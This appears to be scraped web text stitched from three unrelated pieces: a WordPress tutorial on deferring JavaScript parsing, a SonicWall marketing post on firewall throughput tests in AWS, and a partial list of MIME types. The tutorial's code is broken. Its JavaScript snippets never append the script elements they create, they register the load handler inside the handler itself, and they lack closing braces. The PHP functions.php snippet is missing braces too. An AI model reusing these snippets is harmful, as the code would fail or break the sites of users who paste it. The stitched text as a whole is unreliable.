In this article, I will cover what is defer parsing of JavaScript, how to defer parsing of JavaScript properly, why you should defer parsing JavaScript, how to find render-blocking JavaScript(s) which are to be deferred, how to defer multiple JavaScripts in one go, how you can defer parsing of JavaScript in WordPress with or without plugin and how does deferred loading of JavaScript help to speed up your website?

Get WP Rocket WordPress Cache Plugin.
how to defer parsing of javascript in wordpress - how to defer parsing javascript
How to Defer Parsing of JavaScript

In a nutshell, we’ll eliminate render-blocking JavaScript(s) not by actually removing (deleting) them from the website code but by defer loading them. So that they stop blocking the loading (rendering) of meaningful content (the first paint) of the website.

These terms (the above terminology) might be overwhelming for you at first, especially if you’re not a tech guy.

But, don’t worry about that!

I am going to explain everything step by step in simple words. So that you can proceed at your pace and implement the methods to fix ‘Eliminate render-blocking resources’ on your website/blog.

Table of Contents [hide]

What is Defer Parsing JavaScript

A web page is made of up several components which include HTML, CSS/Stylesheets, JavaScript, and graphical (images & icons) components etc. These components are stacked one over another in the code structure of the web page.

When a user types your website URL in the web browser’s address bar and hit enter. The browser first establishes the connection with the server on which your website is hosted.

Once the connection is established, the browser starts rendering the components of the webpage to display the web page.

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The browser renders the components serially from the top towards the bottom of the webpage. That means what comes first rendered first and so on.

When the browser encounters JavaScript on a web page, it downloads the JavaScript, executes it, and then proceeds to render the next component. So during this time browser stop rendering the rest of the web page.

Every time the browser encounters JavaScript, it stops rendering the rest of the webpage until it renders and executes the encountered JavaScript.

That’s how JavaScript blocks the critical rendering path.

To avoid this situation, Google Engineers recommend deferring non-critical JavaScript.

The question still remains the same, What is Defer Parsing of JavaScript?

Defer Parsing of JavaScript can be defined as the process of using defer or async attribute with JavaScript to avoid render blocking of the first paint of a web page. These attributes tell the web browser to parse and execute the JavaScript in parallel (asynchronously) or after (defer) the parsing of HTML of a web page. Thus, the visitors need not wait longer to see the meaningful content of the web page.

Difference between defer or async

Now you know that there are two attributes – defer or async; that can be used to defer javascript loading.

Before we talk about the difference between defer and async, let’s see how does <script> tag works.


Legend - async vs defer attribute
legend async vs defer attribute


script tag
script tag

When we use <script> tag to add script in our code, the HTML is keep parsing till the script file is reached, then onwards parsing will be paused until the script file is downloaded and executed.

Suitability: Not recommended in most cases.

<script defer>

script defer attribute
script defer attribute

When defer attribute is appended with script tag, the script file is downloaded alongside the HTML parsing but the downloaded script executes only after the completion of HTML parsing.

Suitability: For non-critical script files.

<script async>

script async attribute
script async attribute

When async attributed is used with script tag, the script file downloads during HTML parsing, then HTML parsing pauses just to execute the downloaded-script file.

Suitability: For critical script files that cannot be inline.  

Defer loading of JS & PageSpeed Insights recommendation

Let’s try to put this in a perspective with Google PageSpeed Insights warning and recommendation.

When you test, a website using Google Pagespeed Insights Tool, you get some warnings and recommendations to fix those warnings/errors.

Google PSI - Render blocking resources - JavaScripts to be deferred
Google PSI – Render blocking resources – JavaScripts to be deferred

The PageSpeed Insights (PSI) text for render-blocking resources says,

Eliminate render-blocking resources.

Resources are blocking the first paint of your page. Consider delivering critical JS/CSS inline and deferring all non-critical JS/styles.

This warning triggers for two different elements i.e. JavaScript (JS) and CSS when any of them block the critical rendering path 1 during the website loading. Here in this article, we are discussing the JavaScript part.

(In the previous version of PageSpeed Insights Tool, the same warning (for the JavaScript) used to be called ‘Eliminate render-blocking of JavaScript’.)

In simple words, this warning triggers when there are some JavaScript(s) loading on your website which blocks the loading of the content that matters most to your visitors.

This means your visitors have to wait longer to see the meaningful content of your website because JavaScript(s) are blocking the rendering of content.

Clearly, Pagespeed Insights or other site speed testing tools (GTMetrix, etc.) show this warning/error, if your site loads some JavaScript(s) that block the loading of meaningful content (the first paint) of your site.

And this needs to be fixed.

Critical vs Non-critical JavaScript: Explained

As Google PageSpeed Insights (PSI) recommendation says you should deliver critical JS inline and defer all non-critical JS.

What does this mean?

Let’s break that down by terminology.

Critical JavaScripts: JavaScripts that are necessary to load during optimized critical rendering.

Non-critical JavaScripts: Those JS that can wait to load until the first meaningful content (the first paint) of the webpage has loaded.

Inline Delivery: Inline delivery refers to loading a resource (in this case JS) within the HTML code instead of calling/importing that separately.

Curious? Why does JavaScript block the critical rendering path in the first place?

We’ll discuss that in the next section with other reasons why you should Defer JavaScript Parsing.

Do you know? how to

Why You Should Defer Parsing of JavaScript

JavaScript Execution: is a Heavier Task

How does JS Affect SiteSpeed?

First of all, JavaScript(s) is one of the major culprits to make your website slow.

Wondering, why is that?

Because when the web browser comes across a script, it executes the script first before continuing to load HTML that includes the content users are looking for.

For a browser, executing JavaScript is a heavier task (depending on the size of the script) and takes more time as compared to rendering the meaningful content (the first paint) of the webpage.

Hence JavaScript affects the critical rendering path and slows down pagespeed of your website.

Why not defer this heavier task of JS execution so that the critical rendering path remains uninterrupted, right?

Pagespeed: is now a Ranking Factor

Site speed has already become a ranking signal.

About a decade ago Google announced 2 in an official blog post on Google Webmaster Central Blog that site speed has become a ranking signal.

In another blog post published on the Official Webmaster Central Blog in 2018, they revealed 3 that Google started using page speed as a ranking factor in mobile search ranking.

Since Google had declared pagespeed a factor in search result rankings for desktop and mobile. Therefore, site speed optimization has become a significant aspect of technical SEO.

For the same reason, Google PageSpeed Insights Tool recommends deferred parsing of JavaScript as one of the solutions 4 to remove render-blocking JavaScript in above-the-fold content.

User Experience: decides Your Site’s Success

How does JavaScript affect user experience (UX)?

We have already discussed that JavaScript(s) slow down the pagespeed by blocking the rendering of first paint (the meaningful content). That led to more loading time and a longer wait for users to see the content; bad user experience, right.

Speed matters a lot, the truth is users do not like slow-loading websites. In fact, studies show that the users leave a slow loading site early and move on.

On the contrary, you want your website audience to engage with your site and eventually turn into a customer, subscriber, or ad-viewer. In order to make that happen, you need to improve your pagespeed by deferring non-critical JavaScript(s).

Reasons to Defer Loading of JavaScript: Summing it up

As I mentioned above, however, the parser (browser) starts downloading and executing the script over parsing the rest of HTML, whenever it encounters the script.

But the fact is, most of the JavaScript(s) come into use when the complete web page is loaded. For example, in some animation, effect, or functionality, etc.

Therefore, it is a good idea to load JavaScript(s) only after the content has loaded.

This way deferred loading of JavaScript does not affect the critical render path and consequently helps to speed up your website. And hence, a better user experience for your readers.

And by making your site load faster, you also improve your search ranking on desktop as well as mobile.

Do you know, good web hosting is a must for better pagespeed?
If you are already using good web hosting?
Awesome, let’s skip to defer parsing of JavaScript.
Not sure? whether your hosting is as good as your website deserves, don’t worry. We recommend Cloudways and Kinsta Hosting for better sitespeed.
Read our Kinsta Review.

Now, since you have an understanding of what is defer parsing of JavaScript and why you should defer loading of JavaScript(s).

It is a good time to figure out which JavaScript(s) (on your website) are the culprits and need to be deferred.

If you already know which JavaScript(s) on your website are blocking the critical rendering path, you may skip the following section and jump to the implementation part. Otherwise, keep on reading…

How to Find Render-blocking JavaScript(s)

JavaScript(s) which block the rendering of meaningful content are called ‘Render Blocking JavaScript(s)’ and need to be deferred.

You can find render-blocking JavaScript(s) by analyzing your website using site speed testing tools.

There are several pagespeed testing tools available to analyze a website for site speed and loading time. I am sharing with you the most reliable and trusted tools for pagespeed testing.

Test your site using these tools and note the results of these tools so that you can compare the results before and after implementing defer parsing of JavaScript(s).

1. PageSpeed Insights by Google

PageSpeed Insights by Google
PageSpeed Insights by Google

Google PageSpeed Insights (PSI) is an exclusive pagespeed testing tool by Google. Test your website using Google PSI Tool to find out render-blocking JavaScript(s). PageSpeed Insights Tool results give information about warnings and their solutions/fixes.

2. GTmetrix

GTmetrix - Speed and Performance Test Tool
GTmetrix – Speed and Performance Test Tool

This one (GTmetrix) is another good free tool to test site speed. You can test your site with GTmetrix to know which JavaScripts need to be deferred.

3. Pingdom Tools

Pingdom Tools for Website Speed Test
Pingdom Tools for Website Speed Test

Solarwinds’ Pingdom Tools are also very popular when it comes to site speed testing tools. You can test your site using Pingdom Tools to check the number of JS requests on your site and how much they contribute to the total number of requests.

Now you know which JavaScript(s) are making your site slow and need to be deferred. So, let’s see how to fix this issue by deferring non-critical JavaScript(JS).

Test Results: Before Defer Parsing of JavaScript

I have tested a website before implementing defer parsing of JavaScript. Consider these a baseline and compare these results after deferred loading of JavaScripts.

Pagespeed Insights Result before Defer Parsing of JS
Pagespeed Insights Result before Defer Parsing of JS
GTmetrix Result before Defer Parsing of JS
GTmetrix Result before Defer Parsing of JS

How to Defer Parsing of JavaScript [Step by step]

You need to use the following code to defer parsing JavaScript. Insert this code in HTML file just before the </body> tag. Read the instructions given below to use this script.

< script type="text/javascript">
function parseJSAtOnload() {
var element = document.createElement("script");
element.src = "script_to_be_deferred.js";
if (window.addEventListener)
window.addEventListener("load", parseJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", parseJSAtOnload);
else window.onload = parseJSAtOnload;
</script >

Instructions for Defer Parsing JavaScript using the script

Don’t forget to take a complete backup before making any changes in the code. If something went wrong, you can use that backup to go back.

  1. Copy the code and paste it in HTML file just before the </body> tag (near the bottom of HTML file).
  2. Replace script_to_be_deferred.js with the link of the JavaScript which is to be deferred. You can copy the link of JavaScript(s) (which Google PageSpeed tool suggests to defer) from Google PageSpeed Insights tool results for your website.
  3. Save changes. And you are done.
  4. Finally, test your website again to see the effect.

Code to Defer Multiple JavaScripts in One-go

If you want to defer multiple scripts in one go. You can use the same script with little modification. In the following code replace defer1.js, defer3.js, and defer3.js, etc. with the link of scripts that you want to defer.

 < script type="text/javascript">
function parseJSAtOnload() {
var links = ["defer1.js", "defer2.js", "defer3.js"],
headElement = document.getElementsByTagName("head")[0],
linkElement, i;
for (i = 0; i < links.length; i++) {
linkElement = document.createElement("script");
linkElement.src = links[i];
if (window.addEventListener)
window.addEventListener("load", parseJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", parseJSAtOnload);
else window.onload = parseJSAtOnload;
</script >  

How to Defer Parsing of JavaScript in WordPress

You can defer parsing of JavaScript in WordPress by following methods:

  1. Using WordPress Plugins (with a plugin) – suitable for all plugin lovers.
  2. Adding a Code Snippet to function.php file – suitable for those who are used to playing with code and editing files in WordPress. – without plugin method #1
  3. Using the Script mentioned above  – suitable for geeks who don’t want to use a plugin. – without plugin method #2

1. Defer Parsing of JavaScript using WordPress Plugin

There are several WordPress plugins available to defer parsing of JavaScript in WordPress, I am listing the best plugins that stand out in the crowd because of their performance and reliability.

Obviously, the process of installing and activating any of the following plugins remains the same.

If you’re not sure about the process of installing a WordPress plugin, you can refer this beginner’s guide to learn different methods of installing a plugin in WordPress.

#1.1 Async JavaScript Plugin

If you want a standalone plugin to defer parsing of JavaScript, Async JavaScript should be your pick.

This tiny plugin offers all necessary settings to tweak deferred loading of JS in WordPress.


Steps to defer parsing of javascript in WordPress using a plugin:

  1. Navigate to WordPress Dashboard > Plugins > Add New.
  2. Search Async JavaScript Plugin in the plugin repository.
  3. Install and activate Async JavaScript Plugin.
  4. Head-over to WordPress Dashboard > Settings > Async JavaScript.
  5. Go to Settings tab of Async JavaScript Plugin.
  6. Check the box against ‘Enable Async JavaScript’ option and save changes to start deferring Javascript in WordPress.
  7. There are other options as mentioned below; You can tweak the relevant option as per your need.
  • enable asyns js for logged-in user
  • on cart/check out pages
  • quick settings
  • async javascript method
  • jQuery
  • scripts to Async
  • scripts to Defer
  • script Exclusion
  • plugin exclusions
  • theme exclusion
Async Javascript Plugin - Defer JS WordPress
Async Javascript Plugin – Defer JS WordPress

#1.2 Defer Parsing of JavaScript Setting in WP Rocket Plugin

WP Rocket is a power-pack of features when it comes to WordPress speed optimization.

You can easily defer loading of javascript using WP Rocket to speed up your site.

Steps involved to enable defer loading of JS using WP Rocket plugin:

  1. Install and active WP Rocket plugin.
  2. Go to WP Dashboard > Settings > WP Rocket.
  3. Under File Optimization enable Load JavaScript deferred option and save changes.
  4. Now test your site to check results.
Load JavaScript deferred - WP Rocket
Load JavaScript deferred – WP Rocket


Hell, YES!

You can read, how we got load time under 1s using WP Rocket.

#1.3 Defer Parsing of JavaScript: W3 Total Cache

You can defer JavaScript loading in WordPress using W3 Total Cache plugin.

Steps to defer parsing of JavaScript using W3 Total Cache WordPress plugin:

  • Head-over to WordPress Dashboard > Plugins > Add New.
  • Search W3 Total Cache in the plugin repository.
  • Install and activate W3 Total Cache plugin.
  • Go over WP Dashboard > Performance (W3 Total Cache Settings) > Minify.
  • Scroll down to JS minify settings. You will see settings like shown in the image below.
  • Check/select options as shown in the image below. Click Save all settings and you are done.
  • Test your site using pagespeed test to see the results.
Defer JavaScript - W3 Total Cache
Defer JavaScript – W3 Total Cache

#1.4 Defer Loading of JavaScript in LiteSpeed Cache Plugin

LiteSpeed Cache is an amazing optimization plugin for LiteSpeed server hosting. But the general features of this plugin can be utilized on any server like LiteSpeed, Apache, NGINX, etc.

Steps to defer parsing of javascript in LiteSpeed Cache plugin:

  • Go to WP Dashboard > Plugins > Add New.
  • Search Litespeed Cache in the plugin repository.
  • Install and activate LiteSpeed Cache plugin.
  • Navigate to WP Dashboard > LiteSpeed Cache > Page Optimization > JS Settings.
  • Scroll down to Load JS Deferred And turn it ON and save changes.
  • Now test your website using pagespeed tool to check the result.

#1.5 Defer Parsing of JavaScript using Swift Performance Plugin

Swift Performance plugin has become a well known name in the speed optimization category. Their free version is called ‘Swift Performance Lite’.

The process to delay loading of JS in WordPress using Swift Performance:

  • Head-over to WP Dashboard > Plugins > Add New.
  • Search Swift Performance Lite in the plugin repository.
  • Install and activate Swift Performance Lite
  • Navigate to WP Dashboard > Tools > Swift Performance > Settings > Optimization > Scripts.
  • Enable the option called Merge Scripts. Once you enable it, other related options will appear.
  • Now add the scripts to be deferred under the option called Deferred Scripts and Save changes.
  • Finally, test your website using speed test tool to see the result.
Deferred Scripts setting - Swift Performance Plugin
Deferred Scripts setting – Swift Performance Plugin

#1.6 Defer Parsing of JavaScript in WordPress using Speed Booster Pack 

Speed Booster Pack also offers deferred loading of javascript out of the box. 

Step by step procedure to enable defer loading of js in Speed Booster Pack plugin:

  • Go to WordPress Dashboard > Plugins > Add New.
  • Search Speed Booster Pack in the plugin repository.
  • Install and activate Speed Booster Pack plugin.
  • Navigate to WP Dashboard > Speed Booster > Assets.
  • Scroll down to the option called Optimize JavaScript. Under this option choose Defer for deferred loading of JS.
  • Save changes and you’re done.
  • Now, test your site using pagespeed test tool to check the result.
Defer Javascript - Speed Booster Pack Plugin
Defer Javascript – Speed Booster Pack Plugin

#1.7 Defer Parsing of JavaScript: Autoptimize

Autoptimize another good plugin to optimize WordPress speed. This plugin also offers the option to defer load JS in WordPress.

Step by step process to defer parsing javascript using Autoptimize:

  • Navigate to WordPress Dashboard > Plugins > Add New.
  • Search Autoptimize in WordPress plugin repository.
  • Install and activate Autoptimize plugin.
  • Go to Dashboard > Settings > Autoptimize > JS, CSS & HTML.
  • Under JavaScript Options enable Optimize JavaScript Code and,
  • Then enable Do not aggregate but defer option and save changes.
  • Now Empty Cache and test your site using speed test tool to see the result.
Defer Javascript Loading - Autoptimize
Defer Javascript Loading – Autoptimize

#1.8 WP Fastest Cache to Defer Parsing of JavaScript

You can eliminate render-blocking JavaScript resources using WP Fastest Cache plugin. But this feature is available with the premium version only.

2. Defer JavaScript Parsing in WordPress via functions.php file

Yes, you can defer parsing of JavaScript in WordPress by adding a code snippet to function.php file.

This is one of the methods that you can use to Defer Parsing of JavaScript in WordPress without using a plugin.

As I have mentioned above this method is suitable for people who are comfortable with code editing in WordPress.

You might be thinking, but why?

First of all, functions.php is an important theme file. That means you might end up breaking your site easily if anything went wrong with the editing of functions.php file.

Also, there are different versions of the code snippet on the web to fix defer parsing of JavaScript in WordPress via functions file. Unfortunately, not all the code snippets work fine.

So you should be careful while using a code snippet to defer loading of JavaScript.

How to Edit functions.php File Safely

I always recommend using a child theme in WordPress in order to avoid code editing mess.

Because while editing the code, even if you miss a single comma (,) semicolon (;) or any other symbol/syntax, your website will break completely or partially. And you have to make extra efforts to recover the site.

If you’re not using a child theme, learn how to use a child theme in WordPress and its benefits.

For any reason, if you don’t want to implement a child theme now, you can use this plugin to add code to functions.php file of your theme without editing the original file.

Step by step process to Defer Parsing JavaScript in WordPress via functions.php

Take a complete backup before making any changes to the code.

I assume that you’re using a child theme. If you’re not, first create and activate a child theme to any trouble because of theme file editing.

  1. Go to your WordPress Dashboard > Appearance > Theme Editor
  2. Select/open functions.php file (of child theme) from theme files.
  3. Paste the code snippet given below at the end of functions.php file.
  4. You can specify JS files to exclude from defer in the array (‘jquery.js’).
  5. Finally, click Update File to save changes. That’s all.

The code snippet is to be pasted in functions.php file.

// Defer Parsing of JavaScript in WordPress via functions.php file
// Learn more at 

function defer_parsing_js($url) {
//Add the files to exclude from defer. Add jquery.js by default
    $exclude_files = array('jquery.js');
//Bypass JS defer for logged in users
    if (!is_user_logged_in()) {
        if (false === strpos($url, '.js')) {
            return $url;

        foreach ($exclude_files as $file) {
            if (strpos($url, $file)) {
                return $url;
    } else {
        return $url;
    return "$url' defer='defer";

add_filter('clean_url', 'defer_parsing_js', 11, 1);

The above code snippet is using defer attribute to defer parsing of JavaScripts. You can replace the defer attribute with async attribute to parse JavaScript asynchronously. You can read more about async attribute and other methods to fix render-blocking JavaScript.

3. Defer Parsing of JavaScript without WordPress Plugin – Script Method

The script method explained above can be used in WordPress to defer loading of javascript. In WordPress, the above-mentioned code can be placed in HTML file just before the </body> tag using hook content option.

Most of the popular WordPress themes come with hook content provision. If you are not using the hook content option or it is not available in your theme. Then, either you can use a WordPress plugin to add the script to WordPress footer before </body> tag or you can place the script in the footer file just before the </body> tag manually.

Facing any difficulty adding the script in WordPress footer? Check out our detailed guide, to learn how to add code in WordPress header and footer easily.

Steps to defer load javascript in WordPress without using a plugin:

  1. Copy the code and paste that before the </body> tag (using a plugin or built-in theme hook) .
  2. Now replace script_to_be_deferred.js with the JavaScript to be deferred.
  3. Save changes and you’re done.
  4. Clear the cache, if there is any.
  5. Test your website again to see the result.

Test Results: After Defer Parsing of JavaScript

The following are the test results after defer loading of JavaScript.

PageSpeed Insights Result after fixing Defer Parsing of JavaScript
PageSpeed Insights Result after fixing Defer Parsing of JavaScript
GTmetrix result after implementing Defer Parsing of JavaScript
GTmetrix result after implementing Defer Parsing of JavaScript

Wrapping it up

Other than defer parsing of JavaScript, you can also use async attribute or inline JavaScript to remove render-blocking JavaScript. I have covered async attribute or inline JavaScript in another blog post, read that article here. In that article, I have also mentioned a few useful WordPress plugins to defer parsing JavaScript.

Although WordPress plugins are available to defer parsing of JavaScript. The above-explained script method is considered more appropriate by several experts and webmasters. But the people who use WordPress know that using a WordPress plugin is like bliss.

I hope this guide will help you to defer parsing of JavaScript. Let me know, which technique you use to defer parsing of JavaScript. If you are facing any problem implementing the above methods or have a question. Let me know via the comment section. I will be happy to answer.


Source :

NSv Virtual Firewall: Tested and Certified in AWS Public Cloud

Looking for the best way to extend your firewall protection to the cloud? Independent testing recently found that SonicWall NSv series is more than up to the challenge.

More than 90% of enterprises use the cloud in some way, with 69% of those considered hybrid cloud users (utilizing both private and public clouds). Along with widespread remote work adoption, this shift is driving the need for scaled-out, distributed infrastructure.

Within this new cloud landscape, security has become more complex as the number of perimeters and integrations grow, and cybercriminals increasingly focus on security gaps and vulnerabilities in cloud implementations. It’s often easier for threat actors to exploit these vulnerabilities than it is to breach hardened components of the cloud deployment.

A next-generation firewall deployed in the cloud can protect critical data stored in the cloud. But it’s important to make sure this firewall provides the same level of security and performance as an on-premises firewall.

Recently, Tolly Group used Keysight Technologies’ brand-new native cloud testing solution — CyPerf — to measure the performance of SonicWall NSv 470 virtual firewall in Amazon Web Services (AWS). AWS is the major public cloud vendor, with a projected 49% market share in enterprise cloud adoption for 2022. AWS recommends a shared responsibility model, meaning AWS is responsible for the security of the cloud, and the customer is responsible for security in the cloud.

What is SonicWall NSv virtual firewall?

SonicWall’s NSv Series virtual firewalls provide all the security advantages of a physical firewall, plus all the operational and economic benefits of the cloud — including system scalability and agility, speed of system provisioning, simple management and cost reduction. NSv delivers full-featured security tools including VPN, IPS, application control and URL filtering. These capabilities shield all critical components of the private/public cloud environments from resource misuse attacks, cross-virtual-machine attacks, side-channel attacks, and common network-based exploits and threats.

What is Keysight Technologies CyPerf?

Keysight CyPerf is the industry’s first cloud-native software solution that recreates every aspect of a realistic workload across a variety of physical and cloud environments. CyPerf deployed across a variety of heterogeneous cloud environments realistically models dynamic application traffic, user behavior and threat vectors at scale. It validates hybrid cloud networks, security devices and services for more confident rollouts.

Putting SonicWall NSv to the Test

Keysight Technologies and Tolly Group engineers tested a SonicWall NSv 470 virtual firewall running SonicOSX version 7. The AWS instance for the NSv 470 under test was AWS C5.2xlarge. The engineers deployed CyPerf agents on AWS C5.n2xlarge instances to be certain that the agents would have sufficient resources to stress the firewall under test. Each of two agent instances was provisioned with 8 vCPUs, 21GB memory and 25GbE network interfaces.

Product Image

Test methodology and results

The engineers used three different traffic profiles to collect results — unencrypted HTTP traffic, encrypted (HTTPS/TLS) traffic, and Tolly’s productivity traffic mix, which includes five applications: JIRA, Office 365, Skype, AWS S3 and Salesforce. Engineers used CyPerf application mix tests to create the Tolly productivity mix and generate stateful, simulated application traffic.

The tests were run against three different security profiles:

1) Firewall: Basic firewall functions with no policy set

2) IPS: Firewall with the intrusion prevention system feature enabled

3) Threat Prevention: Firewall with IPS, antivirus, anti-spyware and application control features enabled

The results observed in the AWS public cloud environment are similar to the results observed in virtual environment.

TestUnencrypted HTTP TrafficEncrypted HTTPS/TLS Traffic 
Firewall Throughput7.70 Gbps3.10 Gbps
IPS Throughput7.60 Gbps3.05 Gbps
Threat Prevention7.40 Gbps3.04 Gbps

Table 1: Test measurements for NSv 470 in AWS Cloud

Note: The table above highlights just a few of the test results. For complete results and test parameters, please download the report.


Most enterprises are moving their datacenters away from traditional on-premises deployments and to the cloud. It is imperative that security teams provide the same level of security for cloud server instances as they have been doing for on-premises physical servers. A next-generation firewall with advanced security services like IPS and application control is the first step to securing cloud instances against cyber threats.

In addition to security features, it also important to choose a firewall that provides the right level of performance needed for a given cloud workload. SonicWall NSv series offers a variety of models with performance levels suited to any size of cloud deployment, with all the necessary security features enabled. To learn more about how SonicWall NSv Series excels in AWS environments, click here.

Source :

All known MIME types

There are 2343 known MIME types.

application/x-shockwave-flash2-previewMacromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
audio/module-xmModule Music Formats (Mods) fdd
audio/rmfAIFF (Audio Interchange File Format) fdd
audio/vnd.qcelpAIFF (Audio Interchange File Format) fdd
audio/x-gsmAIFF (Audio Interchange File Format) fdd
audio/x-midiAIFF (Audio Interchange File Format) fdd
audio/x-modModule Music Formats (Mods) fdd
audio/x-pn-aiffAIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
audio/x-rmfAIFF (Audio Interchange File Format) fdd
sound/aiffAIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
video/mp1sMPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
video/mp2pMPEG-2 Video Encoding (H.262) fdd
MPEG-2 Encoding Family fdd
3d/vnd.adobe.dn+dcxAdobe Dimension ffw
application-x/geogebra-fileGgb ffw
application/acadDWG ffw
AutoCad Drawing tika
application/acrobatPDF (Portable Document Format) Family fdd
application/activemessageapplication/activemessage tika
application/andrew-insetapplication/andrew-inset tika
application/applefileAppleSingle ffw
application/applefile tika
—  application/applefile; version=”1″AppleSingle 1 pronom
—  application/applefile; version=”2″AppleSingle 2 pronom
application/applixwareapplication/applixware tika
application/atom+xmlAtom ffw
application/atom+xml tika
application/atomcat+xmlapplication/atomcat+xml tika
application/atomicmailapplication/atomicmail tika
application/atomsvc+xmlapplication/atomsvc+xml tika
application/auth-policy+xmlapplication/auth-policy+xml tika
application/autocad_dwgDWG ffw
AutoCad Drawing tika
application/batch-smtpapplication/batch-smtp tika
application/beep+xmlapplication/beep+xml tika
application/binhexBinHex ffw
application/mac-binhex40 tika
application/cals-1840application/cals-1840 tika
application/cborConcise Binary Object Representation container tika
application/ccxml+xmlapplication/ccxml+xml tika
application/cea-2018+xmlapplication/cea-2018+xml tika
application/cellml+xmlapplication/cellml+xml tika
application/cnrp+xmlapplication/cnrp+xml tika
application/commongroundapplication/commonground tika
application/conference-info+xmlapplication/conference-info+xml tika
application/cpl+xmlapplication/cpl+xml tika
application/csta+xmlapplication/csta+xml tika
application/cstadata+xmlapplication/cstadata+xml tika
application/csvCSV ffw
application/cu-seemeapplication/cu-seeme tika
application/cybercashapplication/cybercash tika
application/dartDart githublinguist
application/davmount+xmlapplication/davmount+xml tika
application/dbaseMapInfo Data File (DAT) fdd
dBASE Table File Format (DBF) fdd
dBASE Table for ESRI Shapefile (DBF) fdd
—  application/dbase; version=”iv”dBASE Database IV pronom
application/dbfMapInfo Data File (DAT) fdd
dBASE Table File Format (DBF) fdd
dBASE Table for ESRI Shapefile (DBF) fdd
application/dca-rftapplication/dca-rft tika
application/dec-dxapplication/dec-dx tika
application/dec-dx.DEC Data Exchange File pronom
application/dialog-info+xmlapplication/dialog-info+xml tika
application/dicomDICOM ffw
DICOM medical imaging data tika
Digital Imaging and Communications in Medicine File Format pronom
application/dnsapplication/dns tika
application/dvcsapplication/dvcs tika
application/dwfDWF ffw
—  application/dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  application/x-dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  drawing/x-dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  image/vnd.dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  image/x-dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  model/vnd.dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
application/dwgDWG ffw
AutoCad Drawing tika
application/dxfDXF ffw
application/ecmascriptActionScript ffw
ECMAScript ffw
application/ecmascript tika
ECMAScript Language (ECMA-262), including JavaScript fdd
application/edi-consentapplication/edi-consent tika
application/edi-x12application/edi-x12 tika
application/edifactapplication/edifact tika
application/emma+xmlapplication/emma+xml tika
application/epp+xmlapplication/epp+xml tika
application/epub+zipEPUB ffw
RePub ffw
Digital Replica Plus ffw
Electronic Publication tika
ePub format pronom
EPUB, Electronic Publication, Version 2 fdd
EPUB, Electronic Publication, Version 3.0.1 (2014). ISO/IEC 23736:2020 fdd
EPUB, Electronic Publication, Version 3.0 (2011). ISO/IEC TS 30135:2014 fdd
EPUB (Electronic Publication) File Format Family fdd
EPUB, Electronic Publication, Version 3.2 fdd
—  application/x-ibooks+zipApple iBooks Author publication format tika
Apple iBook format pronom
application/eshopapplication/eshop tika
application/exampleapplication/example tika
application/f4mF4M ffw
application/fastinfosetapplication/fastinfoset tika
application/fastsoapapplication/fastsoap tika
application/fitsFlexible Image Transport System ffw
Flexible Image Transport System tika
Flexible Image Transport System pronom
Flexible Image Transport System (FITS), Version 3.0 fdd
—  image/fitsFlexible Image Transport System ffw
image/fits tika
Flexible Image Transport System pronom
Flexible Image Transport System (FITS), Version 3.0 fdd
application/font-tdpfrPFR ffw
application/font-tdpfr tika
application/font-woffWOFF ffw
Web Open Font Format pronom
application/freemindMm ffw
application/futuresplashSWF ffw
Macromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
application/gdiffGDIFF ffw
application/geopackage+sqlite3GeoPackage Encoding Standard (OGC) Format Family fdd
application/gml+xmlGeography Markup Language pronom
application/gzipGzip Compressed Archive tika
application/gzip-compressedGzip Compressed Archive tika
application/gzippedGzip Compressed Archive tika
application/h224application/h224 tika
application/httpapplication/http tika
application/hyperstudioapplication/hyperstudio tika
application/ibe-key-request+xmlapplication/ibe-key-request+xml tika
application/ibe-pkg-reply+xmlapplication/ibe-pkg-reply+xml tika
application/ibe-pp-dataapplication/ibe-pp-data tika
application/igesIGES ffw
application/iges tika
application/im-iscomposing+xmlapplication/im-iscomposing+xml tika
application/indexapplication/index tika
application/index.cmdapplication/index.cmd tika
application/index.objapplication/index.obj tika
application/index.responseapplication/index.response tika
application/index.vndapplication/index.vnd tika
application/internet-shortcutInternet Shortcut ffw
application/iotpapplication/iotp tika
application/ippapplication/ipp tika
application/isupapplication/isup tika
application/java-serialized-objectapplication/java-serialized-object tika
application/java-vmJava Class File tika
application/jpgJFIF, JPEG File Interchange Format, Version 1.02 fdd
application/json-patch+jsonJSON Patch ffw
application/kpml-request+xmlapplication/kpml-request+xml tika
application/kpml-response+xmlapplication/kpml-response+xml tika
application/ld+jsonJSON-LD ffw
Web Annotation Protocol ffw
application/lost+xmlapplication/lost+xml tika
application/lotus123; version=”3.0″Lotus 1-2-3 Worksheet 3.0 pronom
application/lotus123; version=”4-5″Lotus 1-2-3 Worksheet 4-5 pronom
application/lwp; version=”96″Lotus WordPro Document 96 pronom
application/lwp; version=”97/millennium”Lotus WordPro Document 97/Millennium pronom
application/mac-binhexBinHex ffw
application/mac-binhex40 tika
application/mac-binhex40BinHex ffw
application/mac-binhex40 tika
application/mac-compactproapplication/mac-compactpro tika
application/macbinaryMacBinary ffw
application/macwriteiiapplication/macwriteii tika
application/marcMARC ffw
application/marc tika
application/mathematicaapplication/mathematica tika
Mathematica Notebook pronom
application/mathml+xmlapplication/mathml+xml tika
application/matlab-matapplication/x-matlab-data tika
MAT-File Level 5 File Format fdd
application/mbms-associated-procedure-description+xmlapplication/mbms-associated-procedure-description+xml tika
application/mbms-deregister+xmlapplication/mbms-deregister+xml tika
application/mbms-envelope+xmlapplication/mbms-envelope+xml tika
application/mbms-msk+xmlapplication/mbms-msk+xml tika
application/mbms-msk-response+xmlapplication/mbms-msk-response+xml tika
application/mbms-protection-description+xmlapplication/mbms-protection-description+xml tika
application/mbms-reception-report+xmlapplication/mbms-reception-report+xml tika
application/mbms-register+xmlapplication/mbms-register+xml tika
application/mbms-register-response+xmlapplication/mbms-register-response+xml tika
